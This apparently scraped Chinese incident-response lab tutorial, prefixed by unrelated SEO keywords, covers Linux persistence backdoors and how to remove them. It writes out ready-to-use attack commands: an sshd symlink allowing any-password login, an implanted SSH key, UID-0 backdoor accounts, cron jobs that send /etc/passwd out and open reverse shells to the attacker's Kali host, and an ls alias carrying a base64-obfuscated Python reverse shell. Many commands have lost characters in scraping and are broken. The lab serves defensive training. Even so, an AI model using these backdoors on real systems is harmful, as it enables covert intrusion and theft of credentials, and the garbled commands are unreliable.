网站开发的广告,Wordpress 百度多久收录,杭州网站,大学生兼职做网站本次应急响应实验用kali和centos7来充当攻击机和靶机
kali#xff1a;192.168.10.130
centos7#xff1a;192.168.10.155
前提#xff1a;
用kali连接到centos7上面ssh root192.168.10.155 一、SSH软链接
任意密码登录即可发现程度#xff1a;||||||
ln -sf /usr/sbi…本次应急响应实验用kali和centos7来充当攻击机和靶机
kali192.168.10.130
centos7192.168.10.155
前提
用kali连接到centos7上面ssh root192.168.10.155 一、SSH软链接
任意密码登录即可发现程度||||||
ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oPort12345 使用kali进行登录这次密码随便输入即可
ssh rootxx.xx.xx.xx-p 12345 应急处置流程
第一步查看服务器开放的端口号
使用netstat -anpt查看端口发现可疑的端口12345 切换到3642的pid目录下面发现有软链接后门 第二步确定软链接后门文件
查看所有的su文件以及查找具体哪一个su是软链接后门
find -name su ll /usr/local/su 第三步删除软链接后门
rm -rf /usr/local/su
切断进程
kill -9 3642
kill -9 4147 二、ssh公私钥免密登录
使用密钥进行登录
发现程度|||||
创建秘钥对然后将公钥上传到拿下的服务器中实现root账号免密登录
1. 生成ssh秘钥对
ssh-keygen -t rsa
保存路径输入 ./id_rsa 保存到当前路径。接着再按两次回车 2.将id_rsa.pub公钥上传到服务中 将公钥写入到authorized_keys文件中
mkdir /root/.ssh touch /root/.ssh/authorized_keys cat id_rsa.pub /root/.ssh/authorized_keys chmod 600 /root/.ssh/authorized_keys chmod 700 /root/.ssh/ 3.配置允许使用秘钥登录
vim /etc/ssh/sshd_config
RSAAuthentication yes
PubkeyAuthentication yes 4.ssh秘钥登录
ssh -i id_rsa root192.168.10.155
应急处置流程
直接切换到/root/.ssh目录下面把authorized_keys删掉即可注意查看一下生成的时间防止删掉客户之前生成的 三、后门账号添加
使用命令添加账号
发现程度||||||
添加root用户
#添加账号test1设置uid为0密为123456
useradd -p openssl passwd -1 -salt salt 123456 test1 -o -u 0 -g root -G root -s /bin/bash -d /home/test1
or
echo ruoji:x:0:0::/:/bin/sh /etc/passwd #增加超级用户账号
如果系统不允许uid0的用户远程登录可以增加一个普通用户账号
echo mx7krshell::-1:-1:-1:-1:-1:-1:500 /etc/shadow
passwd ruoji #修改ruoji的密码为ruoji 应急处置流程
1.查找特殊权限账号默认root如果出现其他账号需要警惕
awk -F: {if($30) print $1} /etc/passwd 2.查找可以登录ssh的账号
s$( sudo cat /etc/shadow | grep ^[^:]*:[^*!] | awk -F: {print $1});for i
in $s;do cat /etc/passwd | grep -v /bin/false|/nologin| grep $i;done | sort
| uniq |awk -F: {print $1} 3.删除后门帐号
在root用户下cat /etc/passwd | grep ruoji这一步是确认ruoji存在
用ps查看ruoji正在使用的进程把他的进程进行杀死kill -9 5373 杀死进程之后sudo userdel -rf ruoji这一步强制删除用户
进入root根目录删除和用户相关的文件夹 cd 进入根目录找到ruoji然后rm -rf ruoji 删除文件夹
进入home目录 cd /home 看是否有和ruoji同名的文件夹有的话也用 rm -rf删掉
在root根目录下进入 /var/spool/mail/ 目录下找到user1相关目录删除
四、定时计划任务后门
生成命令网址[~]#棱角 ::Edge.Forum*
crontab -e
*/1 * * * * nc 192.168.10.130 5555 /etc/passwd #每一分钟把文件弹给kali
*/1 * * * * bash -i /dev/tcp/192.168.10.130/7777 01 #每一分钟把shell反弹到kali上
kali监听指定7777端口可以获得shell 应急处置流程
1.crontab -l或者crontab -e查看定时任务-e比-l查的更全一点 2.有些挖矿计划任务会写到Linux自带的计划任务里
用whereis cron查看自带的计划任务 五、别名后门
alias命令的功能:为命令设置别名
定义:alias lsls -al
删除:unalias ls
每次输入ls命令的时候都能实现ls -al
alias lsalerts(){ ls $* --colorauto;bash -i /dev/tcp/192.168.10.130/3333 01;};alerts
执行ls就会反弹shell,持久化隐藏重启依旧生效,但是执行ls之后会卡住容易被发现
别名配置存在 ~/.bashrc 配置文件中
cat ~/.bashrc|grep alias
下面这种方法可以在执行ls时候不会卡住可以说是最好用的一种方法
alias lsalerts(){ ls $* --colorauto;python3 -c import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,\UTF-8\)}[sys.version_info[0]](\aW1wb3J0IG9zLHNvY2tldCxzdWJwcm9jZXNzOwpyZXQgPSBvcy5mb3JrKCkKaWYgcmV0ID4gMDoKICAgIGV4aXQoKQplbHNlOgogICAgdHJ5OgogICAgICAgIHMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pCiAgICAgICAgcy5jb25uZWN0KCgiMTkyLjE2OC4xMC4xMzAiLCA2NjY2KSkKICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCksIDApCiAgICAgICAgb3MuZHVwMihzLmZpbGVubygpLCAxKQogICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSwgMikKICAgICAgICBwID0gc3VicHJvY2Vzcy5jYWxsKFsiL2Jpbi9zaCIsICItaSJdKQogICAgZXhjZXB0IEV4Y2VwdGlvbiBhcyBlOgogICAgICAgIGV4aXQoKQ\)));};alerts 应急处置流程
netstat -anpt ps -ef | grep 8094 然后删掉可疑进程
kill -9 8094
查看可疑别名alias 删除别名unalias ls
